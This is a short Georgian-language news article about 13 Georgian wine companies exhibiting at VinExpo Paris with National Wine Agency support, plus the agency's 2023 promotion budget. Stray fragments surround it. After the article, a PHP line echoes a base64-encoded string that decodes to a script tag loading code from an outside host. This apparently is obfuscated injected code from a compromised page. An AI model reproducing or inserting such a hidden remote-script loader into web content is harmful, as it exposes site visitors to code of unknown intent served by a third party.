celsiusi
ავერსი შნაიდერი

ღვინის ეროვნული სააგენტოს მხარდაჭერით, ქართული ღვინის მწარმოებელი კომპანიები საფრანგეთში, გამოფენაში „VinExpo Paris” მონაწილეობენ.

როგორც "Business Time"-ს ღვინის ეროვნული სააგენტოდან აცნობეს, პარიზში საერთაშორისო გამოფენა „VinExpo Paris” მიმდინარეობს, რომელშიც ქართული ღვინის მწარმოებელი 13 კომპანია ღვინის ეროვნული სააგენტოს მხარდაჭერით მონაწილეობს.

სამი დღის განმავლობაში, მსოფლიოს 52 ქვეყნის 3 ათასზე მეტი მწარმოებელი საკუთარ პროდუქციას გამოფენის 30 ათასამდე ვიზიტორს წარუდგენს.

სხვადასხვა დასახელების ქართული ღვინო წარმოდგენილი იქნება გამოფენის ფარგლებში მოწყობილ სპეციალურ სადეგუსტაციო სივრცეებშიც.

მსგავსი მასშტაბის და მნიშვნელობის ღონისძიებაში მონაწილეობა ზრდის ქართული ღვინის საერთაშორისო ცნობადობას და მეწარმეებს ახალი სავაჭრო პარტნიორების მოძიების შესაძლებლობებს აძლევს. გამოფენაზე თავს იყრიან ღვინის პროფესიონალები, იმპორტიორები და მედიის წარმომადგენლები მსოფლიოს მრავალი ქვეყნიდან.

ქართული ღვინის საექსპორტო ბაზრების დივერსიფიცირების მიზნით, ღვინის ეროვნული სააგენტოს ფინანსური და ორგანიზაციული მხარდაჭერით, 2023 წელს, ქართული ღვინო ამერიკის შეერთებულ შტატებში, ევროპისა და აზიის ქვეყნების ბაზრებზე აქტიურად იქნება წარმოდგენილი.
ქართული ღვინის პოპულარიზაციის ხელშეწყობის პროგრამის 2023 წლის სახელმწიფო ბიუჯეტი 14 მილიონი ლარით განისაზღვრა, რაც 2 მილიონი ლარით აღემატება 2022 წლის დამტკიცებულ ბიუჯეტს.

376
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");